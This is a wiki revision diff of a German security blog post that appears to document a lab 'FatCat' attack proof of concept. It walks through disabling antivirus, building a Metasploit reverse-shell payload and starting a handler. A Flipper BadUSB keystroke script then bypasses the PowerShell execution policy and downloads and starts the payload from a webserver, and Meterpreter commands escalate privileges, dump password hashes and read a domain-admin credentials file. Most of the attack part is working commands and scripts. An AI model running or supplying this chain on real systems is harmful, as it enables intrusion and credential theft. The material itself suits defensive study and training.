Unterschiede
Hier werden die Unterschiede zwischen zwei Versionen angezeigt.
| Nächste Überarbeitung | Vorhergehende Überarbeitung | ||
| it-security:blog:fatcat_poc [2024/02/13 14:11] – angelegt psycore | it-security:blog:fatcat_poc [2024/04/14 12:07] (aktuell) – psycore | ||
|---|---|---|---|
| Zeile 3: | Zeile 3: | ||
| ====== FatCat Attack PoC ====== | ====== FatCat Attack PoC ====== | ||
| + | In diesem PoC nutzen wir mehrere Sicherheitslücken, | ||
| + | <code text> | ||
| + | | ||
| + | | ___|_ _| |_ / ___|__ _| |_ | ||
| + | | |_ / _` | __| | / _` | __| | ||
| + | | _| (_| | |_| |__| (_| | |_ | ||
| + | |_| \__, | ||
| + | Attack PoC | ||
| + | </ | ||
| + | \\ | ||
| + | \\ | ||
| + | ===== Beschreibung ===== | ||
| + | |||
| + | {{page> | ||
| + | |||
| + | Zielsetzung soll sein, relevante SAM Daten aus der Registry abzuziehen. Hierzu wird der Flipper als BadUSB Device benutzt. Die PowerShell Execution Policy soll umgangen werden und mit einer Privilege Escalation die erforderlichen Rechte gesichert werden. Folgende Daten sollen exfiltriert werden: | ||
| + | |||
| + | ^ User ^ Passwort ^ Hash ^ | ||
| + | | Host \ User | | | | ||
| + | | Host \ Admin | | | | ||
| + | | Domain \ Admin | | | | ||
| + | \\ | ||
| + | \\ | ||
| + | ===== Ablauf ===== | ||
| + | |||
| + | - AV deaktivieren | ||
| + | - Payload erstellen | ||
| + | - handler starten | ||
| + | - BadUSB Angriff | ||
| + | - RemoteShell nutzen zum Erkunden | ||
| + | - Exploit suchen | ||
| + | - Exploit anwenden | ||
| + | - Creds einsammeln | ||
| + | \\ | ||
| + | \\ | ||
| + | ===== Dokumentation ===== | ||
| + | |||
| + | ^ Attack Chain Step ^ Attack Technique ^ Attack Tool ^ | ||
| + | | @# | ||
| + | | @# | ||
| + | | ::: | Bypass | PowerShell Restrictions((https:// | ||
| + | | @# | ||
| + | | ::: | Enumeration | **Enumerate System Info** JAWS((https:// | ||
| + | | ::: | Privilege Escalation((https:// | ||
| + | | @# | ||
| + | \\ | ||
| + | \\ | ||
| + | ===== Vorbereitungen und Angriff ===== | ||
| + | |||
| + | ==== Metasploit Payload ==== | ||
| + | |||
| + | * Metasploit starten | ||
| + | * cmd öffnen | ||
| + | |||
| + | <code dos> | ||
| + | |||
| + | * Payload generieren | ||
| + | |||
| + | <code dos> | ||
| + | |||
| + | * Shell verlassen | ||
| + | |||
| + | <code dos> | ||
| + | |||
| + | * Payload auf einem Webserver hinterlegen | ||
| + | \\ | ||
| + | [{{: | ||
| + | \\ | ||
| + | ==== Metasploit Handler ==== | ||
| + | |||
| + | * Multi Handler Server starten | ||
| + | |||
| + | <code ruby> | ||
| + | use exploit/ | ||
| + | set payload windows/ | ||
| + | set LHOST 192.168.2.77 | ||
| + | set LPORT 50666 | ||
| + | exploit | ||
| + | </ | ||
| + | \\ | ||
| + | [{{: | ||
| + | \\ | ||
| + | ==== Zugriff auf das Zielsystem ==== | ||
| + | |||
| + | * Mit dem Flipper, wird folgendes Script auf dem Zielsystem ausgeführt | ||
| + | |||
| + | <code dos> | ||
| + | WINDOWS r | ||
| + | DELAY 2000 | ||
| + | STRING powershell.exe | ||
| + | DELAY 3000 | ||
| + | ENTER | ||
| + | DELAY 5000 | ||
| + | STRING Set-ExecutionPolicy Bypass -Scope Process -force | ||
| + | DELAY 3000 | ||
| + | ENTER | ||
| + | DELAY 3000 | ||
| + | STRING irm https://< | ||
| + | DELAY 3000 | ||
| + | ENTER | ||
| + | DELAY 5000 | ||
| + | STRING Start-Process msfpayload.exe | ||
| + | DELAY 3000 | ||
| + | ENTER | ||
| + | DELAY 3000 | ||
| + | STRING exit | ||
| + | DELAY 1500 | ||
| + | ENTER | ||
| + | </ | ||
| + | \\ | ||
| + | [{{: | ||
| + | \\ | ||
| + | ==== Verbindung steht - Metasploit macht' | ||
| + | |||
| + | <code dos> | ||
| + | getsystem | ||
| + | hashdump | ||
| + | ls | ||
| + | getwd | ||
| + | cd c: | ||
| + | cd Glob_Share | ||
| + | ls | ||
| + | background | ||
| + | use post/ | ||
| + | sessions | ||
| + | set session 1 | ||
| + | run | ||
| + | use exploit/ | ||
| + | set session 1 | ||
| + | exploit | ||
| + | cd glob_share | ||
| + | type Domain-Admin-Creds.txt | ||
| + | hashdump | ||
| + | sessions -i 1 | ||
| + | </ | ||
| + | |||
| + | [{{: | ||
| + | [{{: | ||
| + | [{{: | ||
| + | [{{: | ||
| + | |||
| + | ~~DISCUSSION~~ | ||